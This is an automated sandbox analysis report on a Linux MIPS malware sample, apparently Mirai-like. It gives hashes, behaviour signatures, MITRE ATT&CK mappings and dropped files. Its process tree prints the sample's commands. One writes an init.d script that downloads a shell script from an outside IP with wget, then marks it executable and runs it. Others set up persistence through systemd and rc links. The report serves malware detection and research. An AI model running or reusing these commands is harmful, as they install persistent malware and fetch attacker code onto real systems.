Overview

overview

7

Static

static

1

f34e59d971...67.elf

debian-9-mipsel

7

Analysis

  • max time kernel
    58s
  • max time network
    133s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    21/11/2024, 08:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf

  • Size

    134KB

  • MD5

    2fcff406e1f57e00d98b987d23cd398f

  • SHA1

    7675a391d83a38868d5f9194a9c7248291e1705a

  • SHA256

    f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067

  • SHA512

    6003c40f6af2626ab5fcf6fc381e4e27abb624111d8e297d24b2110d78134ade98cc702e0fe3c556b65900b9a03efbde16e53395280bdbf395b9d936c19227de

  • SSDEEP

    1536:tLXuqtWr4N9zWJPEceN7U9empeIwOdzZXz8EmbycedlGcYx3dZ3aHXzy+LwCvnqX:puqtWr4DItmecedlotFU3vnqln

Score
7/10
defense_evasiondiscoverypersistenceprivilege_escalation

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

    persistenceprivilege_escalationdefense_evasion
  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

    persistence
  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

    persistence
  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

    persistenceprivilege_escalation
  • Modifies Bash startup script 2 TTPs 1 IoCs
    persistence
  • Changes its process name 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
    /tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads runtime system information
    PID:703
    • /bin/sh
      sh -c "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
        PID:706
        • /bin/systemctl
          systemctl enable custom.service
          3⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:715
      • /bin/sh
        sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
        2⤵
          PID:740
        • /bin/sh
          sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
          2⤵
          • File and Directory Permissions Modification
          • Modifies init.d
          PID:741
        • /bin/sh
          sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
          2⤵
          • File and Directory Permissions Modification
          PID:743
          • /bin/chmod
            chmod +x /etc/init.d/sh
            3⤵
            • File and Directory Permissions Modification
            PID:747
        • /bin/sh
          sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
          2⤵
            PID:758
            • /bin/mkdir
              mkdir -p /etc/rc.d
              3⤵
              • Reads runtime system information
              PID:760

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Persistence

        Boot or Logon Autostart Execution

        4
        T1547

        XDG Autostart Entries

        1
        T1547.013

        Boot or Logon Initialization Scripts

        2
        T1037

        RC Scripts

        2
        T1037.004

        Create or Modify System Process

        1
        T1543

        Systemd Service

        1
        T1543.002

        Event Triggered Execution

        1
        T1546

        Unix Shell Configuration Modification

        1
        T1546.004

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Privilege Escalation

        Boot or Logon Autostart Execution

        4
        T1547

        XDG Autostart Entries

        1
        T1547.013

        Boot or Logon Initialization Scripts

        2
        T1037

        RC Scripts

        2
        T1037.004

        Create or Modify System Process

        1
        T1543

        Systemd Service

        1
        T1543.002

        Event Triggered Execution

        1
        T1546

        Unix Shell Configuration Modification

        1
        T1546.004

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Defense Evasion

        File and Directory Permissions Modification

        1
        T1222

        Linux and Mac File and Directory Permissions Modification

        1
        T1222.002

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Impair Defenses

        1
        T1562

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Command and Control

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /boot/bootcmd
          Filesize

          110B

          MD5

          2a3758c7be4b51e45514ca71272a2241

          SHA1

          16f6c47091d87086ae361ee9653af0bbb3f0afb7

          SHA256

          05e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7

          SHA512

          246177d06d5c8d2444663c4d4828f3be8ca640123b6f0934add6953aa9b54e12e7114912644503fd598aa57dedd5a4392e14e136ce2c628899ed1f607a2b77ee

          Download Submit

        • /etc/init.d/mybinary
          Filesize

          97B

          MD5

          0680c195fdd2fca0a0e632cf637d150e

          SHA1

          7ded21dcbe33cfde13db634f159b7748b28b61c1

          SHA256

          1d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d

          SHA512

          fad47bb194885f9e6b7875e99f4469807eb1aaac0fa7d04b647420bce466a1eb422320eafa59e180bdbd4c69414f671138fb60bdd87403a414f0624d678e497f

          Download Submit

        • /etc/init.d/sh
          Filesize

          354B

          MD5

          064ba5f4b09e62ca552b70a2e94d6393

          SHA1

          7076e742aa5e9757e555091c4a72206018115518

          SHA256

          038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1

          SHA512

          5488263037dd93ae9daa23e987a2c4016ad4f241d3d318abfbba4d19bf67fa7e1084bf09f03ab07580df49a3b8ac45767e6cbc03cf7e71afff5adb942ef42eb9

          Download Submit

        • /etc/inittab
          Filesize

          102B

          MD5

          e5e2c6d263b0ee1c9c19d46192ad5cdf

          SHA1

          3197ca0f3394eedd2c4702cb6eaf7a22817d5fef

          SHA256

          436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548

          SHA512

          bd5e7113e820c1771eeedac572c16201bcc490b820d5d18323f03dfa7e263e14f1bacbf5923a24daac0db1f9789ace29682307464e098f72820655537b6c2786

          Download Submit

        • /etc/systemd/system/custom.service
          Filesize

          291B

          MD5

          a31178fddb5564754ff49f0865dd2b20

          SHA1

          f0b205696a09245229469d0ac1809135be57a837

          SHA256

          d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d

          SHA512

          7e2e400c9b70d54c7f4c196e8cf7970d4510577ab2777ab7694cb254445a68128256d10750e156681fdab7f35469f0efd9632ddc5432fb078ebf6f57da382a9d

          Download Submit